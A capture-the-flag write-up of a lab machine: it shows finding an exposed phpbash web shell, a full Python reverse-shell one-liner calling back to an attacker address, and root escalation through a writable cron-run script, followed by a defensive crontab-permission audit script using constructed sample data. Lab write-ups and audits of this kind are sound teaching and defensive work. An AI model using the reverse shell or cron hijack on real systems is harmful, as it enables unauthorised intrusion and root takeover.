I began the box by first opening the IP address on a web browser to see if anything was there. I noticed it was a blog-style website and there was a single post with the title: phpbash.
I checked out the GitHub page and noticed that there were two files of interest in the main repository: phpbash.php and phpbash.min.php.
While this was all going down, I made sure to run a simple nmap scan to see if there were any other services running.
The scan revealed that there was only a single port open (port 80) and I was able to confirm that the most likely point of entry would be through the website (I was thinking of hidden files).
I ran a simple dirbuster scan for the files phpbash.php and phpbash.min.php and saw these files appear under 10.10.10.68/dev/. I navigated to phpbash.php as the name “bash” suggested a shell and was surprised to find that it actually gave me a web-based shell. I navigated to the “/” directory and came across the “home” directory where I was able to find the user flag.
The next thing on my to-do list was to escalate from the web-based shell to a terminal. After quickly looking through the tools available on the box, I found out that I could run python, so I decided to create my reverse shell using the popular python one-liner that allowed me to connect back to the terminal on my Kali VM.
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.107",8989));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Once on the terminal, I decided to snoop around to find possible entry points for privilege escalation. Running “sudo -l” showed me an interesting user that could run commands without a password.
From the / directory, I came across two folders that were noteworthy (scripts & root) which I could not access from the web-shell user so I decided to use the scriptmanager user to list the contents of the folder.
We can see that the test.py is owned by scriptmanager. The test.txt is owned by root but its content is generated from the python script. I had no idea where to go from here but as I was messing around with the text file, I noticed that after a certain period of time the file reset back to its original contents. From here, I was almost certain that a scheduled task was running this python script as root.
From this point there were multiple ways to get the root flag. One of the methods was to overwrite the script so that it opens up the flag from /root/flag.txt, but this could spoil the flag for people that might still be working on the box. Because of this, I decided that I would just create another reverse shell from the root user to retrieve the flag.
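As an added defensive check, not part of this writeup: a small audit that reads a system crontab and flags root jobs whose script, or the directory holding it, is owned by a non-root user or is group/world-writable, which is the condition that made the scheduled script exploitable here. The crontab text and the file ownership table are constructed samples; a live run would pass a wrapper around os.stat() as the st argument.

```python
import os
import re
import shlex
# Constructed /etc/crontab sample; not the box's real crontab.
SAMPLE_CRONTAB = """\
# m h dom mon dow user  command
* * * * * root python /scripts/test.py
30 2 * * * root /usr/local/bin/rotate.sh
0 3 * * * backup /usr/local/bin/backup.sh
"""
# Constructed metadata, path -> (owner uid, mode bits). A live audit would pass
# a wrapper around os.stat() as `st`; this mapping lets the check run offline.
SAMPLE_STAT = {
    "/scripts": (1001, 0o755),               # directory owned by a normal user
    "/scripts/test.py": (1001, 0o644),
    "/usr/local/bin": (0, 0o755),
    "/usr/local/bin/rotate.sh": (0, 0o777),  # root-owned but world-writable
    "/usr/local/bin/backup.sh": (0, 0o755),
}
CRON_LINE = re.compile(r"^(?:\S+\s+){5}(?P<user>\S+)\s+(?P<cmd>.+)$")

def weak_perms(path, st):
    """Return why a non-root user could change `path`, or '' if it looks safe."""
    try:
        uid, mode = st(path)
    except (KeyError, OSError):
        return "not found"
    if uid != 0:
        return f"owned by uid {uid}"
    if mode & 0o022:  # group or other write bit set
        return f"group/world writable (mode {oct(mode & 0o777)})"
    return ""

def audit_crontab(text, st=lambda p: SAMPLE_STAT[p]):
    """Return (job, path, reason) for root jobs whose script or its directory is modifiable."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        m = CRON_LINE.match(line)
        if not m or line.startswith("#") or m.group("user") != "root":
            continue  # comments, blanks, and jobs that do not run as root
        for word in shlex.split(m.group("cmd")):
            if not word.startswith("/"):
                continue  # interpreter name or option, not the script path
            for target in (word, os.path.dirname(word)):
                reason = weak_perms(target, st)
                if reason:
                    findings.append((line, target, reason))
            break  # the first absolute path is taken as the script
    return findings
```

Against the sample it reports test.py and its /scripts directory as owned by uid 1001 and rotate.sh as world-writable, while the backup job is skipped because it does not run as root.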
This was an easy but fun box with all the basic checks that should be done so it was good to get a refresher on these techniques.